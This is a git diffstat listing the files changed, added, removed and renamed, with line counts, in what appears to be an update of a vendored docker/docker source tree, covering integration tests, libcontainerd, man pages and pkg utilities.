.../integration-cli/docker_cli_ps_test.go | 504 +- .../docker_cli_pull_local_test.go | 82 +- .../integration-cli/docker_cli_pull_test.go | 46 +- .../docker_cli_pull_trusted_test.go | 365 - .../integration-cli/docker_cli_push_test.go | 367 +- .../docker_cli_registry_user_agent_test.go | 75 +- .../integration-cli/docker_cli_rename_test.go | 138 - .../docker_cli_restart_test.go | 61 +- .../integration-cli/docker_cli_rm_test.go | 86 - .../integration-cli/docker_cli_rmi_test.go | 116 +- .../integration-cli/docker_cli_run_test.go | 1278 ++-- .../docker_cli_run_unix_test.go | 399 +- .../docker_cli_save_load_test.go | 86 +- .../docker_cli_save_load_unix_test.go | 30 +- .../integration-cli/docker_cli_search_test.go | 6 +- .../docker_cli_secret_create_test.go | 59 +- .../docker_cli_secret_inspect_test.go | 68 - .../docker_cli_service_create_test.go | 324 +- .../docker_cli_service_health_test.go | 101 +- ...cker_cli_service_logs_experimental_test.go | 96 - .../docker_cli_service_logs_test.go | 388 ++ .../docker_cli_service_scale_test.go | 6 +- .../docker_cli_service_update_test.go | 115 +- .../integration-cli/docker_cli_sni_test.go | 2 +- .../integration-cli/docker_cli_stack_test.go | 186 - .../integration-cli/docker_cli_start_test.go | 38 +- .../integration-cli/docker_cli_stats_test.go | 27 +- .../integration-cli/docker_cli_stop_test.go | 17 - .../integration-cli/docker_cli_swarm_test.go | 1422 +++- .../docker_cli_swarm_unix_test.go | 60 +- .../integration-cli/docker_cli_tag_test.go | 225 - .../integration-cli/docker_cli_top_test.go | 16 +- .../integration-cli/docker_cli_update_test.go | 41 - .../docker_cli_update_unix_test.go | 64 +- .../integration-cli/docker_cli_userns_test.go | 16 +- .../docker_cli_v2_only_test.go | 103 +- .../docker_cli_version_test.go | 58 - .../integration-cli/docker_cli_volume_test.go | 350 +- .../integration-cli/docker_cli_wait_test.go | 5 +- .../docker_deprecated_api_v124_test.go | 83 +- .../docker_deprecated_api_v124_unix_test.go | 5 +- .../docker_experimental_network_test.go | 594 -- .../docker_hub_pull_suite_test.go | 18 +- .../integration-cli/docker_test_vars.go | 165 - .../docker/integration-cli/docker_utils.go | 1607 ----- .../integration-cli/docker_utils_test.go | 466 ++ .../environment/environment.go | 49 + .../{events_utils.go => events_utils_test.go} | 6 +- .../docker/docker/integration-cli/fixtures.go | 69 - .../auth/docker-credential-shell-test | 2 +- .../fixtures/deploy/default.yaml | 9 - .../fixtures/deploy/remove.yaml | 11 - .../fixtures/deploy/secrets.yaml | 20 - .../integration-cli/fixtures/https/ca.pem | 24 +- .../fixtures/https/client-cert.pem | 74 +- .../fixtures/https/client-key.pem | 17 +- .../fixtures/https/server-cert.pem | 77 +- .../fixtures/https/server-key.pem | 17 +- .../fixtures/notary/delgkey1.crt | 21 - .../fixtures/notary/delgkey1.key | 27 - .../fixtures/notary/delgkey2.crt | 21 - .../fixtures/notary/delgkey2.key | 27 - .../fixtures/notary/delgkey3.crt | 21 - .../fixtures/notary/delgkey3.key | 27 - .../fixtures/notary/delgkey4.crt | 21 - .../fixtures/notary/delgkey4.key | 27 - .../integration-cli/fixtures/notary/gen.sh | 18 - .../fixtures/notary/localhost.cert | 19 - .../fixtures/notary/localhost.key | 27 - .../integration-cli/fixtures/secrets/default | 1 - ...aemon.go => fixtures_linux_daemon_test.go} | 36 +- .../docker/docker/integration-cli/registry.go | 177 - .../docker/integration-cli/registry_mock.go | 55 - .../requirement/requirement.go | 34 + .../docker/integration-cli/requirements.go | 243 - .../integration-cli/requirements_test.go | 219 + .../integration-cli/requirements_unix.go | 159 - .../integration-cli/requirements_unix_test.go | 117 + ...st_vars_exec.go => test_vars_exec_test.go} | 0 ...ars_noexec.go => test_vars_noexec_test.go} | 0 ...seccomp.go => test_vars_noseccomp_test.go} | 0 ...s_seccomp.go => test_vars_seccomp_test.go} | 0 .../{test_vars.go => test_vars_test.go} | 2 +- ...st_vars_unix.go => test_vars_unix_test.go} | 0 ...s_windows.go => test_vars_windows_test.go} | 0 .../load => testdata}/emptyLayer.tar | Bin .../docker/integration-cli/trust_server.go | 344 - .../docker/docker/integration-cli/utils.go | 79 - .../docker/integration-cli/utils_test.go | 183 + .../integration/build/build_session_test.go | 129 + .../integration/build/build_squash_test.go | 103 + .../docker/integration/build/build_test.go | 460 ++ .../docker/integration/build/main_test.go | 33 + .../docker/integration/config/config_test.go | 356 + .../docker/integration/config/main_test.go | 33 + .../docker/integration/container/copy_test.go | 65 + .../integration/container/create_test.go | 303 + .../container/daemon_linux_test.go | 78 + .../docker/integration/container/diff_test.go | 42 + .../docker/integration/container/exec_test.go | 50 + .../integration/container/export_test.go | 78 + .../integration/container/health_test.go | 47 + .../integration/container/inspect_test.go | 48 + .../docker/integration/container/kill_test.go | 183 + .../integration/container/links_linux_test.go | 57 + .../docker/integration/container/logs_test.go | 35 + .../docker/integration/container/main_test.go | 33 + .../container/mounts_linux_test.go | 208 + .../docker/integration/container/nat_test.go | 120 + .../integration/container/pause_test.go | 98 + .../docker/integration/container/ps_test.go | 49 + .../integration/container/remove_test.go | 112 + .../integration/container/rename_test.go | 213 + .../integration/container/resize_test.go | 66 + .../integration/container/restart_test.go | 114 + .../integration/container/stats_test.go | 43 + .../docker/integration/container/stop_test.go | 127 + .../container/update_linux_test.go | 107 + .../integration/container/update_test.go | 64 + .../docker/docker/integration/doc.go | 3 + .../docker/integration/image/commit_test.go | 48 + .../docker/integration/image/import_test.go | 42 + .../docker/integration/image/main_test.go | 33 + .../docker/integration/image/remove_test.go | 59 + .../docker/integration/image/tag_test.go | 140 + .../internal/container/container.go | 54 + .../integration/internal/container/exec.go | 86 + .../integration/internal/container/ops.go | 136 + .../integration/internal/container/states.go | 41 + .../integration/internal/network/network.go | 35 + .../integration/internal/network/ops.go | 87 + .../internal/requirement/requirement.go | 53 + .../integration/internal/swarm/service.go | 200 + .../docker/integration/network/delete_test.go | 73 + .../docker/integration/network/helpers.go | 85 + .../integration/network/inspect_test.go | 180 + .../integration/network/ipvlan/ipvlan_test.go | 432 ++ .../integration/network/ipvlan/main_test.go | 33 + .../network/macvlan/macvlan_test.go | 282 + .../integration/network/macvlan/main_test.go | 33 + .../docker/integration/network/main_test.go | 33 + .../integration/network/service_test.go | 315 + .../plugin/authz/authz_plugin_test.go | 521 ++ .../plugin/authz/authz_plugin_v2_test.go | 175 + .../integration/plugin/authz/main_test.go | 180 + .../plugin/graphdriver/external_test.go} | 307 +- .../plugin/graphdriver/main_test.go | 36 + .../plugin/logging/cmd/close_on_start/main.go | 48 + .../logging/cmd/close_on_start/main_test.go | 1 + .../plugin/logging/cmd/cmd_test.go | 1 + .../plugin/logging/cmd/dummy/main.go | 19 + .../plugin/logging/cmd/dummy/main_test.go | 1 + .../plugin/logging/helpers_test.go | 67 + .../plugin/logging/logging_test.go | 79 + .../integration/plugin/logging/main_test.go | 29 + .../plugin/logging/validation_test.go | 35 + .../docker/integration/plugin/pkg_test.go | 1 + .../plugin/volumes/cmd/cmd_test.go | 1 + .../plugin/volumes/cmd/dummy/main.go | 19 + .../plugin/volumes/cmd/dummy/main_test.go | 1 + .../plugin/volumes/helpers_test.go | 73 + .../integration/plugin/volumes/main_test.go | 32 + .../integration/plugin/volumes/mounts_test.go | 58 + .../docker/integration/secret/main_test.go | 33 + .../docker/integration/secret/secret_test.go | 366 + .../docker/integration/service/create_test.go | 374 + .../integration/service/inspect_test.go | 153 + .../docker/integration/service/main_test.go | 33 + .../integration/service/network_test.go | 75 + .../docker/integration/service/plugin_test.go | 121 + .../docker/integration/session/main_test.go | 33 + .../integration/session/session_test.go | 48 + .../system/cgroupdriver_systemd_test.go | 56 + .../docker/integration/system/event_test.go | 122 + .../integration/system/info_linux_test.go | 48 + .../docker/integration/system/info_test.go | 42 + .../docker/integration/system/login_test.go | 28 + .../docker/integration/system/main_test.go | 33 + .../docker/integration/system/version_test.go | 23 + .../docker/integration/testdata/https/ca.pem | 23 + .../testdata/https/client-cert.pem | 73 + .../integration/testdata/https/client-key.pem | 16 + .../testdata/https/server-cert.pem | 76 + .../integration/testdata/https/server-key.pem | 16 + .../docker/integration/volume/main_test.go | 33 + .../docker/integration/volume/volume_test.go | 116 + .../docker/internal/test/daemon/config.go | 82 + .../docker/internal/test/daemon/container.go | 40 + .../docker/internal/test/daemon/daemon.go | 681 ++ .../internal/test/daemon/daemon_unix.go | 39 + .../internal/test/daemon/daemon_windows.go | 25 + .../docker/internal/test/daemon/node.go | 82 + .../docker/docker/internal/test/daemon/ops.go | 44 + .../docker/internal/test/daemon/plugin.go | 77 + .../docker/internal/test/daemon/secret.go | 84 + .../docker/internal/test/daemon/service.go | 131 + .../docker/internal/test/daemon/swarm.go | 194 + .../docker/internal/test/environment/clean.go | 217 + .../internal/test/environment/environment.go | 158 + .../internal/test/environment/protect.go | 254 + .../internal/test/fakecontext/context.go | 131 + .../docker/internal/test/fakegit/fakegit.go | 136 + .../internal/test/fakestorage/fixtures.go | 92 + .../internal/test/fakestorage/storage.go | 200 + .../test}/fixtures/load/frozen.go | 86 +- .../test/fixtures/plugin/basic/basic.go | 34 + .../internal/test/fixtures/plugin/plugin.go | 216 + .../docker/docker/internal/test/helper.go | 6 + .../docker/internal/test/registry/ops.go | 26 + .../docker/internal/test/registry/registry.go | 255 + .../internal/test/registry/registry_mock.go | 71 + .../test/request}/npipe.go | 2 +- .../test/request}/npipe_windows.go | 2 +- .../docker/internal/test/request/ops.go | 78 + .../docker/internal/test/request/request.go | 218 + .../docker/internal/testutil/helpers.go | 17 + .../docker/internal/testutil/stringutils.go | 14 + .../internal/testutil/stringutils_test.go | 34 + .../github.com/docker/docker/layer/empty.go | 7 +- .../docker/docker/layer/empty_test.go | 14 +- .../docker/docker/layer/filestore.go | 25 +- .../docker/docker/layer/filestore_test.go | 8 +- .../docker/docker/layer/filestore_unix.go | 15 + .../docker/docker/layer/filestore_windows.go | 35 + .../github.com/docker/docker/layer/layer.go | 70 +- .../docker/docker/layer/layer_store.go | 152 +- .../docker/layer/layer_store_windows.go | 2 +- .../docker/docker/layer/layer_test.go | 71 +- .../docker/docker/layer/layer_unix.go | 4 +- .../docker/docker/layer/layer_unix_test.go | 6 +- .../docker/docker/layer/layer_windows.go | 76 +- .../docker/docker/layer/migration.go | 16 +- .../docker/docker/layer/migration_test.go | 18 +- .../docker/docker/layer/mount_test.go | 51 +- .../docker/docker/layer/mounted_layer.go | 5 +- .../docker/docker/layer/ro_layer.go | 38 +- .../docker/docker/layer/ro_layer_windows.go | 2 +- .../docker/docker/libcontainerd/client.go | 46 - .../docker/libcontainerd/client_daemon.go | 894 +++ .../libcontainerd/client_daemon_linux.go | 108 + .../libcontainerd/client_daemon_windows.go | 55 + .../docker/libcontainerd/client_linux.go | 605 -- .../libcontainerd/client_local_windows.go | 1319 ++++ .../docker/libcontainerd/client_solaris.go | 101 - .../docker/libcontainerd/client_unix.go | 142 - .../docker/libcontainerd/client_windows.go | 631 -- .../docker/docker/libcontainerd/container.go | 13 - .../docker/libcontainerd/container_unix.go | 250 - .../docker/libcontainerd/container_windows.go | 311 - .../docker/docker/libcontainerd/errors.go | 13 + .../docker/docker/libcontainerd/oom_linux.go | 31 - .../docker/libcontainerd/oom_solaris.go | 5 - .../docker/libcontainerd/pausemonitor_unix.go | 42 - .../docker/docker/libcontainerd/process.go | 18 - .../docker/libcontainerd/process_unix.go | 107 - .../docker/libcontainerd/process_windows.go | 19 +- .../libcontainerd/{queue_unix.go => queue.go} | 10 +- .../docker/docker/libcontainerd/queue_test.go | 31 + .../docker/docker/libcontainerd/remote.go | 20 - .../docker/libcontainerd/remote_daemon.go | 344 + .../libcontainerd/remote_daemon_linux.go | 61 + .../libcontainerd/remote_daemon_options.go | 141 + .../remote_daemon_options_linux.go | 18 + .../libcontainerd/remote_daemon_windows.go | 50 + .../docker/libcontainerd/remote_local.go | 59 + .../docker/libcontainerd/remote_unix.go | 544 -- .../docker/libcontainerd/remote_windows.go | 36 - .../docker/docker/libcontainerd/types.go | 139 +- .../docker/libcontainerd/types_linux.go | 57 +- .../docker/libcontainerd/types_solaris.go | 43 - .../docker/libcontainerd/types_windows.go | 71 +- .../docker/libcontainerd/utils_linux.go | 62 +- .../docker/libcontainerd/utils_solaris.go | 27 - .../docker/libcontainerd/utils_windows.go | 48 +- .../libcontainerd/utils_windows_test.go | 2 +- .../github.com/docker/docker/man/Dockerfile | 24 - .../docker/docker/man/Dockerfile.5.md | 474 -- .../docker/docker/man/Dockerfile.aarch64 | 25 - .../docker/docker/man/Dockerfile.armhf | 43 - .../docker/docker/man/Dockerfile.ppc64le | 35 - .../docker/docker/man/Dockerfile.s390x | 35 - vendor/github.com/docker/docker/man/README.md | 15 - .../docker/docker/man/docker-attach.1.md | 99 - .../docker/docker/man/docker-build.1.md | 340 - .../docker/docker/man/docker-commit.1.md | 71 - .../docker/docker/man/docker-config-json.5.md | 72 - .../docker/docker/man/docker-cp.1.md | 175 - .../docker/docker/man/docker-create.1.md | 553 -- .../docker/docker/man/docker-diff.1.md | 49 - .../docker/docker/man/docker-events.1.md | 180 - .../docker/docker/man/docker-exec.1.md | 71 - .../docker/docker/man/docker-export.1.md | 46 - .../docker/docker/man/docker-history.1.md | 52 - .../docker/docker/man/docker-images.1.md | 153 - .../docker/docker/man/docker-import.1.md | 72 - .../docker/docker/man/docker-info.1.md | 187 - .../docker/docker/man/docker-inspect.1.md | 323 - .../docker/docker/man/docker-kill.1.md | 28 - .../docker/docker/man/docker-load.1.md | 56 - .../docker/docker/man/docker-login.1.md | 53 - .../docker/docker/man/docker-logout.1.md | 32 - .../docker/docker/man/docker-logs.1.md | 71 - .../docker/man/docker-network-connect.1.md | 66 - .../docker/man/docker-network-create.1.md | 187 - .../docker/man/docker-network-disconnect.1.md | 36 - .../docker/man/docker-network-inspect.1.md | 112 - .../docker/docker/man/docker-network-ls.1.md | 188 - .../docker/docker/man/docker-network-rm.1.md | 43 - .../docker/docker/man/docker-pause.1.md | 32 - .../docker/docker/man/docker-port.1.md | 47 - .../docker/docker/man/docker-ps.1.md | 145 - .../docker/docker/man/docker-pull.1.md | 220 - .../docker/docker/man/docker-push.1.md | 63 - .../docker/docker/man/docker-rename.1.md | 15 - .../docker/docker/man/docker-restart.1.md | 26 - .../docker/docker/man/docker-rm.1.md | 72 - .../docker/docker/man/docker-rmi.1.md | 42 - .../docker/docker/man/docker-run.1.md | 1055 --- .../docker/docker/man/docker-save.1.md | 45 - .../docker/docker/man/docker-search.1.md | 70 - .../docker/docker/man/docker-start.1.md | 39 - .../docker/docker/man/docker-stats.1.md | 57 - .../docker/docker/man/docker-stop.1.md | 30 - .../docker/docker/man/docker-tag.1.md | 76 - .../docker/docker/man/docker-top.1.md | 36 - .../docker/docker/man/docker-unpause.1.md | 28 - .../docker/docker/man/docker-update.1.md | 171 - .../docker/docker/man/docker-version.1.md | 62 - .../docker/docker/man/docker-wait.1.md | 30 - .../github.com/docker/docker/man/docker.1.md | 237 - .../github.com/docker/docker/man/dockerd.8.md | 710 -- .../github.com/docker/docker/man/generate.go | 43 - .../github.com/docker/docker/man/generate.sh | 15 - .../github.com/docker/docker/man/glide.lock | 52 - .../github.com/docker/docker/man/glide.yaml | 12 - .../docker/docker/man/md2man-all.sh | 22 - .../docker/docker/migrate/v1/migratev1.go | 41 +- .../docker/migrate/v1/migratev1_test.go | 31 +- .../oci/{defaults_linux.go => defaults.go} | 129 +- .../docker/docker/oci/defaults_solaris.go | 20 - .../docker/docker/oci/defaults_windows.go | 19 - .../docker/docker/oci/devices_linux.go | 20 +- .../docker/docker/oci/devices_unsupported.go | 6 +- .../docker/docker/oci/namespaces.go | 13 +- .../docker/docker/opts/address_pools.go | 84 + .../docker/docker/opts/address_pools_test.go | 20 + vendor/github.com/docker/docker/opts/env.go | 48 + .../github.com/docker/docker/opts/env_test.go | 124 + vendor/github.com/docker/docker/opts/hosts.go | 30 +- .../docker/docker/opts/hosts_test.go | 39 +- .../docker/docker/opts/hosts_unix.go | 2 +- .../docker/docker/opts/hosts_windows.go | 4 +- vendor/github.com/docker/docker/opts/ip.go | 4 +- .../github.com/docker/docker/opts/ip_test.go | 2 +- vendor/github.com/docker/docker/opts/mount.go | 171 - .../docker/docker/opts/mount_test.go | 184 - vendor/github.com/docker/docker/opts/opts.go | 159 +- .../docker/docker/opts/opts_test.go | 50 +- .../docker/docker/opts/opts_unix.go | 4 +- .../docker/docker/opts/opts_windows.go | 4 +- vendor/github.com/docker/docker/opts/port.go | 146 - .../docker/docker/opts/port_test.go | 259 - .../docker/docker/opts/quotedstring.go | 4 +- .../docker/docker/opts/quotedstring_test.go | 20 +- .../docker/{runconfig => }/opts/runtime.go | 2 +- .../github.com/docker/docker/opts/secret.go | 107 - .../docker/docker/opts/secret_test.go | 79 - .../docker/{runconfig => }/opts/ulimit.go | 26 +- .../{runconfig => }/opts/ulimit_test.go | 2 +- vendor/github.com/docker/docker/pkg/README.md | 6 +- .../docker/docker/pkg/aaparser/aaparser.go | 16 +- .../docker/pkg/aaparser/aaparser_test.go | 2 +- .../docker/docker/pkg/archive/archive.go | 562 +- .../docker/pkg/archive/archive_linux.go | 13 +- .../docker/pkg/archive/archive_linux_test.go | 105 +- .../docker/pkg/archive/archive_other.go | 2 +- .../docker/docker/pkg/archive/archive_test.go | 342 +- .../docker/docker/pkg/archive/archive_unix.go | 54 +- .../docker/pkg/archive/archive_unix_test.go | 233 +- .../docker/pkg/archive/archive_windows.go | 27 +- .../pkg/archive/archive_windows_test.go | 6 +- .../docker/docker/pkg/archive/changes.go | 17 +- .../docker/pkg/archive/changes_linux.go | 13 +- .../docker/pkg/archive/changes_other.go | 2 +- .../docker/pkg/archive/changes_posix_test.go | 9 +- .../docker/docker/pkg/archive/changes_test.go | 314 +- .../docker/docker/pkg/archive/changes_unix.go | 9 +- .../docker/pkg/archive/changes_windows.go | 8 +- .../docker/docker/pkg/archive/copy.go | 68 +- .../docker/docker/pkg/archive/copy_unix.go | 2 +- .../docker/pkg/archive/copy_unix_test.go | 116 +- .../docker/docker/pkg/archive/copy_windows.go | 2 +- .../docker/docker/pkg/archive/diff.go | 41 +- .../docker/docker/pkg/archive/diff_test.go | 2 +- .../docker/pkg/archive/example_changes.go | 2 +- .../docker/docker/pkg/archive/time_linux.go | 4 +- .../docker/pkg/archive/time_unsupported.go | 2 +- .../docker/docker/pkg/archive/utils_test.go | 2 +- .../docker/docker/pkg/archive/whiteouts.go | 2 +- .../docker/docker/pkg/archive/wrap.go | 2 +- .../docker/docker/pkg/archive/wrap_test.go | 20 +- .../docker/docker/pkg/authorization/api.go | 4 +- .../docker/pkg/authorization/api_test.go | 76 + .../docker/docker/pkg/authorization/authz.go | 19 +- .../pkg/authorization/authz_unix_test.go | 64 +- .../docker/pkg/authorization/middleware.go | 40 +- .../pkg/authorization/middleware_test.go | 53 + .../pkg/authorization/middleware_unix_test.go | 66 + .../docker/docker/pkg/authorization/plugin.go | 22 +- .../docker/pkg/authorization/response.go | 17 +- .../docker/pkg/broadcaster/unbuffered.go | 2 +- .../docker/pkg/broadcaster/unbuffered_test.go | 3 +- .../docker/pkg/chrootarchive/archive.go | 52 +- .../docker/pkg/chrootarchive/archive_test.go | 71 +- .../docker/pkg/chrootarchive/archive_unix.go | 4 +- .../pkg/chrootarchive/archive_windows.go | 2 +- .../docker/pkg/chrootarchive/chroot_linux.go | 29 +- .../docker/pkg/chrootarchive/chroot_unix.go | 8 +- .../docker/docker/pkg/chrootarchive/diff.go | 2 +- .../docker/pkg/chrootarchive/diff_unix.go | 4 +- .../docker/pkg/chrootarchive/diff_windows.go | 4 +- .../docker/pkg/chrootarchive/init_unix.go | 2 +- .../docker/pkg/chrootarchive/init_windows.go | 2 +- .../docker/docker/pkg/containerfs/archiver.go | 203 + .../docker/pkg/containerfs/containerfs.go | 87 + .../pkg/containerfs/containerfs_unix.go | 10 + .../pkg/containerfs/containerfs_windows.go | 15 + .../docker/pkg/devicemapper/devmapper.go | 96 +- .../docker/pkg/devicemapper/devmapper_log.go | 99 +- .../pkg/devicemapper/devmapper_wrapper.go | 35 +- .../devicemapper/devmapper_wrapper_dynamic.go | 6 + ...mapper_wrapper_dynamic_deferred_remove.go} | 9 +- ...r_wrapper_dynamic_dlsym_deferred_remove.go | 128 + .../devmapper_wrapper_no_deferred_remove.go | 8 +- .../docker/docker/pkg/devicemapper/ioctl.go | 11 +- .../docker/docker/pkg/devicemapper/log.go | 2 +- .../docker/docker/pkg/directory/directory.go | 2 +- .../docker/pkg/directory/directory_test.go | 17 +- .../docker/pkg/directory/directory_unix.go | 16 +- .../docker/pkg/directory/directory_windows.go | 13 +- .../docker/docker/pkg/discovery/README.md | 6 +- .../docker/docker/pkg/discovery/backends.go | 4 +- .../docker/docker/pkg/discovery/discovery.go | 2 +- .../docker/pkg/discovery/discovery_test.go | 2 +- .../docker/docker/pkg/discovery/entry.go | 2 +- .../docker/docker/pkg/discovery/file/file.go | 2 +- .../docker/pkg/discovery/file/file_test.go | 2 +- .../docker/docker/pkg/discovery/generator.go | 2 +- .../docker/pkg/discovery/generator_test.go | 2 +- .../docker/docker/pkg/discovery/kv/kv.go | 4 +- .../docker/docker/pkg/discovery/kv/kv_test.go | 4 +- .../docker/pkg/discovery/memory/memory.go | 2 +- .../pkg/discovery/memory/memory_test.go | 2 +- .../docker/pkg/discovery/nodes/nodes.go | 2 +- .../docker/pkg/discovery/nodes/nodes_test.go | 2 +- .../docker/docker/pkg/dmesg/dmesg_linux.go | 18 + .../docker/pkg/dmesg/dmesg_linux_test.go | 9 + .../docker/pkg/filenotify/filenotify.go | 2 +- .../docker/docker/pkg/filenotify/fsnotify.go | 4 +- .../docker/docker/pkg/filenotify/poller.go | 12 +- .../docker/pkg/filenotify/poller_test.go | 6 +- .../docker/docker/pkg/fileutils/fileutils.go | 209 +- .../docker/pkg/fileutils/fileutils_darwin.go | 2 +- .../docker/pkg/fileutils/fileutils_solaris.go | 7 - .../docker/pkg/fileutils/fileutils_test.go | 142 +- .../docker/pkg/fileutils/fileutils_unix.go | 4 +- .../docker/pkg/fileutils/fileutils_windows.go | 2 +- .../docker/pkg/fsutils/fsutils_linux.go | 23 +- .../docker/pkg/fsutils/fsutils_linux_test.go | 9 +- .../docker/docker/pkg/gitutils/gitutils.go | 100 - .../docker/pkg/gitutils/gitutils_test.go | 220 - .../docker/pkg/graphdb/conn_sqlite3_linux.go | 19 - .../docker/pkg/graphdb/graphdb_linux.go | 551 -- .../docker/pkg/graphdb/graphdb_linux_test.go | 721 -- .../docker/docker/pkg/graphdb/sort_linux.go | 27 - .../docker/pkg/graphdb/sort_linux_test.go | 29 - .../docker/docker/pkg/graphdb/unsupported.go | 3 - .../docker/docker/pkg/graphdb/utils_linux.go | 32 - .../docker/pkg/homedir/homedir_linux.go | 21 + .../docker/pkg/homedir/homedir_others.go | 13 + .../docker/docker/pkg/homedir/homedir_test.go | 2 +- .../homedir/{homedir.go => homedir_unix.go} | 13 +- .../docker/pkg/homedir/homedir_windows.go | 24 + .../docker/docker/pkg/httputils/httputils.go | 56 - .../docker/pkg/httputils/httputils_test.go | 115 - .../docker/pkg/httputils/mimetype_test.go | 13 - .../docker/docker/pkg/idtools/idtools.go | 149 +- .../docker/docker/pkg/idtools/idtools_unix.go | 53 +- .../docker/pkg/idtools/idtools_unix_test.go | 224 +- .../docker/pkg/idtools/idtools_windows.go | 8 +- .../docker/pkg/idtools/usergroupadd_linux.go | 2 +- .../pkg/idtools/usergroupadd_unsupported.go | 2 +- .../docker/docker/pkg/idtools/utils_unix.go | 2 +- .../docker/pkg/integration/cmd/command.go | 294 - .../pkg/integration/cmd/command_test.go | 118 - .../docker/docker/pkg/integration/utils.go | 227 - .../docker/pkg/integration/utils_test.go | 363 - .../docker/docker/pkg/ioutils/buffer.go | 2 +- .../docker/docker/pkg/ioutils/buffer_test.go | 80 +- .../docker/docker/pkg/ioutils/bytespipe.go | 2 +- .../docker/pkg/ioutils/bytespipe_test.go | 2 +- .../docker/docker/pkg/ioutils/fmt.go | 22 - .../docker/docker/pkg/ioutils/fmt_test.go | 17 - .../docker/docker/pkg/ioutils/fswriters.go | 2 +- .../docker/pkg/ioutils/fswriters_test.go | 6 +- .../docker/docker/pkg/ioutils/readers.go | 15 +- .../docker/docker/pkg/ioutils/readers_test.go | 15 +- .../docker/docker/pkg/ioutils/temp_unix.go | 2 +- .../docker/docker/pkg/ioutils/temp_windows.go | 4 +- .../docker/docker/pkg/ioutils/writeflusher.go | 2 +- .../docker/docker/pkg/ioutils/writers.go | 2 +- .../docker/docker/pkg/ioutils/writers_test.go | 2 +- .../docker/docker/pkg/jsonlog/jsonlog.go | 42 - .../docker/pkg/jsonlog/jsonlog_marshalling.go | 178 - .../pkg/jsonlog/jsonlog_marshalling_test.go | 34 - .../docker/pkg/jsonlog/jsonlogbytes_test.go | 39 - .../docker/pkg/jsonlog/time_marshalling.go | 27 - .../pkg/jsonlog/time_marshalling_test.go | 47 - .../docker/pkg/jsonmessage/jsonmessage.go | 182 +- .../pkg/jsonmessage/jsonmessage_test.go | 195 +- .../docker/pkg/listeners/listeners_solaris.go | 31 - .../docker/docker/pkg/locker/README.md | 10 +- .../docker/docker/pkg/locker/locker.go | 2 +- .../docker/docker/pkg/locker/locker_test.go | 39 +- .../docker/docker/pkg/longpath/longpath.go | 2 +- .../docker/pkg/longpath/longpath_test.go | 2 +- .../docker/pkg/loopback/attach_loopback.go | 10 +- .../docker/docker/pkg/loopback/ioctl.go | 29 +- .../docker/pkg/loopback/loop_wrapper.go | 4 +- .../docker/docker/pkg/loopback/loopback.go | 15 +- .../docker/docker/pkg/mount/flags.go | 2 +- .../docker/docker/pkg/mount/flags_freebsd.go | 3 +- .../docker/docker/pkg/mount/flags_linux.go | 50 +- .../docker/pkg/mount/flags_unsupported.go | 5 +- .../docker/docker/pkg/mount/mount.go | 129 +- .../docker/pkg/mount/mount_unix_test.go | 14 +- .../docker/pkg/mount/mounter_freebsd.go | 7 +- .../docker/docker/pkg/mount/mounter_linux.go | 54 +- .../docker/pkg/mount/mounter_linux_test.go | 228 + .../docker/pkg/mount/mounter_solaris.go | 33 - .../docker/pkg/mount/mounter_unsupported.go | 4 +- .../docker/docker/pkg/mount/mountinfo.go | 2 +- .../docker/pkg/mount/mountinfo_freebsd.go | 18 +- .../docker/pkg/mount/mountinfo_linux.go | 153 +- .../docker/pkg/mount/mountinfo_linux_test.go | 156 +- .../docker/pkg/mount/mountinfo_solaris.go | 37 - .../docker/pkg/mount/mountinfo_unsupported.go | 6 +- .../docker/pkg/mount/mountinfo_windows.go | 4 +- .../docker/pkg/mount/sharedsubtree_linux.go | 4 +- .../pkg/mount/sharedsubtree_linux_test.go | 23 +- .../docker/pkg/mount/sharedsubtree_solaris.go | 58 - .../cmd/names-generator/main.go | 3 + .../pkg/namesgenerator/names-generator.go | 69 +- .../namesgenerator/names-generator_test.go | 2 +- .../docker/pkg/parsers/kernel/kernel.go | 2 +- .../pkg/parsers/kernel/kernel_darwin.go | 2 +- .../docker/pkg/parsers/kernel/kernel_unix.go | 18 +- .../pkg/parsers/kernel/kernel_unix_test.go | 2 +- .../pkg/parsers/kernel/kernel_windows.go | 42 +- .../docker/pkg/parsers/kernel/uname_linux.go | 16 +- .../pkg/parsers/kernel/uname_solaris.go | 2 +- .../pkg/parsers/kernel/uname_unsupported.go | 4 +- .../operatingsystem/operatingsystem_linux.go | 2 +- .../operatingsystem_solaris.go | 37 - .../operatingsystem/operatingsystem_unix.go | 2 +- .../operatingsystem_unix_test.go | 2 +- .../operatingsystem_windows.go | 54 +- .../docker/docker/pkg/parsers/parsers.go | 2 +- .../docker/docker/pkg/parsers/parsers_test.go | 2 +- .../docker/docker/pkg/pidfile/pidfile.go | 9 +- .../docker/pkg/pidfile/pidfile_darwin.go | 12 +- .../docker/docker/pkg/pidfile/pidfile_test.go | 2 +- .../docker/docker/pkg/pidfile/pidfile_unix.go | 2 +- .../docker/pkg/pidfile/pidfile_windows.go | 12 +- .../docker/pkg/platform/architecture_linux.go | 12 +- .../docker/pkg/platform/architecture_unix.go | 4 +- .../pkg/platform/architecture_windows.go | 2 +- .../docker/docker/pkg/platform/platform.go | 4 +- .../docker/pkg/platform/utsname_int8.go | 18 - .../docker/pkg/platform/utsname_uint8.go | 18 - .../docker/docker/pkg/plugingetter/getter.go | 39 +- .../docker/docker/pkg/plugins/client.go | 67 +- .../docker/docker/pkg/plugins/client_test.go | 153 +- .../docker/docker/pkg/plugins/discovery.go | 63 +- .../docker/pkg/plugins/discovery_test.go | 4 +- .../docker/pkg/plugins/discovery_unix.go | 2 +- .../docker/pkg/plugins/discovery_unix_test.go | 102 +- .../docker/pkg/plugins/discovery_windows.go | 2 +- .../docker/docker/pkg/plugins/errors.go | 2 +- .../docker/docker/pkg/plugins/plugin_test.go | 114 +- .../pkg/plugins/pluginrpc-gen/README.md | 2 +- .../pkg/plugins/pluginrpc-gen/fixtures/foo.go | 8 +- .../fixtures/otherfixture/spaceship.go | 2 +- .../pkg/plugins/pluginrpc-gen/parser_test.go | 2 +- .../docker/docker/pkg/plugins/plugins.go | 12 +- .../docker/pkg/plugins/plugins_linux.go | 7 - .../docker/docker/pkg/plugins/plugins_unix.go | 9 + .../docker/pkg/plugins/plugins_windows.go | 11 +- .../docker/pkg/plugins/transport/http.go | 2 +- .../docker/pkg/plugins/transport/http_test.go | 21 + .../docker/pkg/plugins/transport/transport.go | 2 +- .../docker/docker/pkg/pools/pools.go | 33 +- .../docker/docker/pkg/pools/pools_test.go | 28 +- .../docker/docker/pkg/progress/progress.go | 7 +- .../docker/pkg/progress/progressreader.go | 2 +- .../pkg/progress/progressreader_test.go | 4 +- .../docker/docker/pkg/promise/promise.go | 11 - 